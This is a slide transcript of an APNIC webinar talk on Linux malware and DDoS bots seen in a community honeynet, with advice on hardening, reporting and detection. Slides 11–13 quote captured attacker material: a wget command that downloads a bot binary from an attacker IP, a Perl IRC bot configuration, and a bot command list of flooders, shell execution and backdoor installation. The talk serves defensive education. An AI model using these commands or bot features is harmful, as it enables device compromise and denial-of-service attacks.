APNIC's Senior Security Specialist Adli Wahid gave a presentation on Linux malware, DDoS agents and bots, based on observations from the Honeynet project at the IX 2020 – Internet Security and Mitigation of Risk Webinar, held online on 15 June 2020.
3. 3
Plan & Objectives
1. Share a different perspective on DDoS
2. Talk about DDoS Agents / Linux Malware
3. Observation from our Community Honeynet Project
3
4. 4
Different Perspective of DDoS
4
My Network /
Infrastructure /
Host
Source
Target / Victim Perspective
Attacker Perspective
5. 5
Victim / Target Perspective
• Availability affected
o System down
o Critical or not (what is affected?)
• Priority
o Business as usual
o Services not distributed
• Increase preparedness (or do nothing)
– Detection
– Incident Response
– Mitigation
• Investigation
– Actor
– Motive
– Attacker infrastructure
Source:
https://www.shadowserver.org/news/mi
rai-botnet-14-1-million-german-
customers-disrupted-liberia-taken-off-
line-and-now-the-culprit-has-been-
convicted/
6. 6
Source of Attack Perspective
• How is attack organized ?
o We tend to see pieces of the puzzle (netflow,
front-end)
• How do attackers build their attacking
infrastructure?
– What tools are used ?
• Can we identify the attacker’s infrastructure ?
• Are we part of the attacker’s infrastructure?
– Can we detect or prevent this?
• Are we contributing to the DDOS problem?
6
7. 7
Tool & Techniques
• Techniques
– Misconfigured services used for amplification attacks
o DNS, SSDP, NTP, Chargen etc
– Recruiting servers & IoT devices as bots
• Exploit known system vulnerabilities
• Exploit weak/default credentials (i.e. ssh / telnet) +
misconfiguration
• Use of Malware
– We hear more about Windows
– Targeting Linux servers and IoT devices to infect device
– ELF binaries or scripts (perl, bash, php etc)
– Device will receive instructions to attack
7
8. 8
Vulnerable services
Mongolia
• Data from Cyber Green
Project
https://stats.cybergreen.net/country/mongolia/
• Challenge – how to deal with misconfiguration
of these services?
8
DDOS Potential
Open SNMP
Open DNS
Open NTP
9. 9
Get reports about your network
• Shadowserver Foundation
o https://www.shadowserver.org/what-we-do/network-reporting/get-
reports/
• CyberGreen
– Download data : https://stats.cybergreen.net/download/
• Do it yourself
– Scan (Nmap)
– Use service such as Shodan.io
9
10. 10
Linux/Unix Malware
• Routers / IoT devices / Servers run Linux /
Unix based OS
• Not new but interesting
– Targets are exposed on the Internet (http,
telnet, 23)
– Unpatched / Unmonitored (i.e. no Anti Virus)
– Default/Weak credentials
• Popular example – Mirai (ddos agent)
– Source code was shared publicly
• Simple technique of infecting and
spreading & persistence
10
11. 11
source
Brute force:
Username: admin password:12345
Remote Code Execution via Web interface
Download Binary / Execute
Scan and gain access
Connect to Command and Control C & C
Bot “recruitment” process
11
wget http://37.x.2x.190:80/13747243572475/hx86_64
2
1
Attacker
12. 12
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircn
my $nick =$rircname[rand scalar @rircname];
my $server = '125.x.y.z';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
Perl Bot
13. 13
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp
flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification
flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop
packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
* Source code
14. 14
Preventing Infection
• Know your assets & customers
– Get reports from Shadowserver,
CyberGreen
– Use tools (nmap) or services like
Shodan.io
– Awareness of Vulnerabilities & Active
exploitation
• Secure / Harden Linux & IOT
Devices
o Access Control to services (brute
force)
o Remove / Harden services – DNS
resolver, NTP, etc
o Patch & Upgrade
14
https://otx.alienvault.net
www.virustotal.com
15. 15
Detection
• Network based detection
– Policy – downloading of ELF / Binary
with certain user agents
– Brute force / telnet related activities
• Network Security Monitoring
– Netflow
– IDS/NSM – Zeek, Suricata
– Honeypots
• Awareness of threat landscape
– Go deep into malware research &
analysis
– Collaborate & share information – c&c,
infected host
• Forensics*
15
Detection with Suricata Rulesets
Fbot - Community Honeynet Project (2019)
https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html